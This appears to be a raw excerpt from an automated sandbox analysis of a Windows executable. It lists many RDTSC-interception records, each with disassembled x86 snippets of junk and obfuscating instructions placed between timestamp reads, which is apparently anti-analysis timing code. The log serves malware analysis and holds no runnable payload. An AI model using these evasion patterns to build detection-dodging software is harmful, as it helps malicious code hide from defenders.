Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194306 second address: 119430B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1196259 second address: 1196278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCC24D21145h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1196278 second address: 1196304 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCC24F87260h 0x00000008 jmp 00007FCC24F8725Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FCC24F87258h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a push 00000000h 0x0000002c jmp 00007FCC24F87268h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FCC24F87258h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d mov ebx, dword ptr [ebp+122D1D1Ch] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FCC24F87261h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11954ED second address: 11954F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11954F2 second address: 1195584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCC24F87256h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e stc 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FCC24F87258h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 call 00007FCC24F87264h 0x0000003c mov edi, dword ptr [ebp+122D3710h] 0x00000042 pop edi 0x00000043 mov eax, dword ptr [ebp+122D000Dh] 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007FCC24F87258h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000018h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 mov edi, dword ptr [ebp+122D2D63h] 0x00000069 push FFFFFFFFh 0x0000006b adc di, 4F4Dh 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 pushad 0x00000075 popad 0x00000076 pushad 0x00000077 popad 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11980CD second address: 11980D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11980D1 second address: 1198148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCC24F87261h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FCC24F87264h 0x00000013 pushad 0x00000014 jl 00007FCC24F87256h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FCC24F87258h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 add edi, dword ptr [ebp+122D1C3Fh] 0x0000003f push 00000000h 0x00000041 mov dword ptr [ebp+122D2FB3h], ecx 0x00000047 and ebx, 6289DF39h 0x0000004d push 00000000h 0x0000004f sbb bl, 00000079h 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1198148 second address: 1198158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007FCC24D21136h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119921D second address: 1199223 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1199223 second address: 1199229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1199229 second address: 119922D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119922D second address: 11992A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call 00007FCC24D21147h 0x0000000e mov dword ptr [ebp+122D3903h], ebx 0x00000014 pop ebx 0x00000015 push 00000000h 0x00000017 mov bx, 9132h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007FCC24D21138h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 jmp 00007FCC24D21147h 0x0000003c or ebx, dword ptr [ebp+122D2794h] 0x00000042 push eax 0x00000043 pushad 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11992A1 second address: 11992A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11973D0 second address: 11973D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1199488 second address: 119948C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119948C second address: 1199492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119C1FF second address: 119C25D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FCC24F87258h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov edi, 7C2FC7C6h 0x00000028 push 00000000h 0x0000002a movzx ebx, di 0x0000002d push 00000000h 0x0000002f mov edi, eax 0x00000031 mov dword ptr [ebp+122D30FBh], esi 0x00000037 xchg eax, esi 0x00000038 jmp 00007FCC24F87265h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1199492 second address: 1199497 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119C25D second address: 119C262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119E210 second address: 119E21B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FCC24D21136h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148640 second address: 1148646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148646 second address: 114864C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114864C second address: 1148654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119E794 second address: 119E7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCC24D21141h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FCC24D2113Dh 0x00000013 nop 0x00000014 add ebx, dword ptr [ebp+122D1C12h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FCC24D21138h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 mov dword ptr [ebp+122D2BC0h], esi 0x0000003c push 00000000h 0x0000003e mov di, dx 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 jl 00007FCC24D2113Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119E7FC second address: 119E807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119E807 second address: 119E812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCC24D21136h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119E812 second address: 119E819 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119EA17 second address: 119EA25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D2113Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A20C5 second address: 11A20DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24F87262h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A20DD second address: 11A20E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141B48 second address: 1141B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCC24F87256h 0x0000000a jmp 00007FCC24F87269h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141B70 second address: 1141B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCC24D21136h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6FDC second address: 11A6FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6FE0 second address: 11A6FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6FE4 second address: 11A6FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007FCC24F87256h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6FF4 second address: 11A6FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6FFA second address: 11A701D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c jmp 00007FCC24F87264h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6AE4 second address: 11A6AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24D2113Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6AF9 second address: 11A6AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6AFD second address: 11A6B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FCC24D21136h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A6B0B second address: 11A6B5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F87265h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a js 00007FCC24F87297h 0x00000010 pushad 0x00000011 jp 00007FCC24F87256h 0x00000017 jmp 00007FCC24F87266h 0x0000001c jnp 00007FCC24F87256h 0x00000022 push eax 0x00000023 pop eax 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jc 00007FCC24F87256h 0x0000002d push edi 0x0000002e pop edi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E66D second address: 113E673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E673 second address: 113E677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AC9CE second address: 11AC9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCC24D21136h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AC9D9 second address: 11AC9E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007FCC24F87256h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AED11 second address: 11AED15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B428E second address: 11B4292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4292 second address: 11B4296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4296 second address: 11B42D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FCC24F8726Ah 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ecx 0x00000012 jng 00007FCC24F87258h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f jbe 00007FCC24F87258h 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4406 second address: 11B4458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007FCC24D21145h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 jnp 00007FCC24D2113Ch 0x00000016 pop esi 0x00000017 mov eax, dword ptr [eax] 0x00000019 push edi 0x0000001a jmp 00007FCC24D2113Fh 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 jbe 00007FCC24D21138h 0x0000002b push edi 0x0000002c pop edi 0x0000002d pushad 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4509 second address: 11B4539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F8725Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCC24F87263h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4539 second address: 11B4543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4543 second address: 11B4547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4547 second address: 11B4570 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCC24D21136h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007FCC24D21148h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4570 second address: 11B4575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4575 second address: 11B4598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007FCC24D21142h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B93E9 second address: 11B93EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B8AFC second address: 11B8B0C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FCC24D2113Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B8B0C second address: 11B8B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007FCC24F87260h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B8B23 second address: 11B8B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FCC24D21136h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B8B32 second address: 11B8B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B8CAE second address: 11B8CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FCC24D21136h 0x0000000a je 00007FCC24D21136h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B926C second address: 11B9298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 js 00007FCC24F8726Fh 0x00000017 jmp 00007FCC24F87263h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C0A55 second address: 11C0A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C0A59 second address: 11C0A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C0A61 second address: 11C0A66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C0D42 second address: 11C0D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C0FF5 second address: 11C1001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCC24D2113Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C1001 second address: 11C1010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 je 00007FCC24F87256h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C13C1 second address: 11C13D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FCC24D2113Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C13D0 second address: 11C13D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C1692 second address: 11C1696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C1696 second address: 11C169A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C17DC second address: 11C17E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166BF9 second address: 1166BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C1C21 second address: 11C1C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24D2113Fh 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FCC24D21148h 0x00000010 jmp 00007FCC24D2113Ah 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C1C5C second address: 11C1C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C1C66 second address: 11C1C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C4F5D second address: 11C4F84 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FCC24F8725Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCC24F87260h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C99AC second address: 11C99B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C9C3D second address: 11C9C43 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C9C43 second address: 11C9C4D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCC24D2113Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
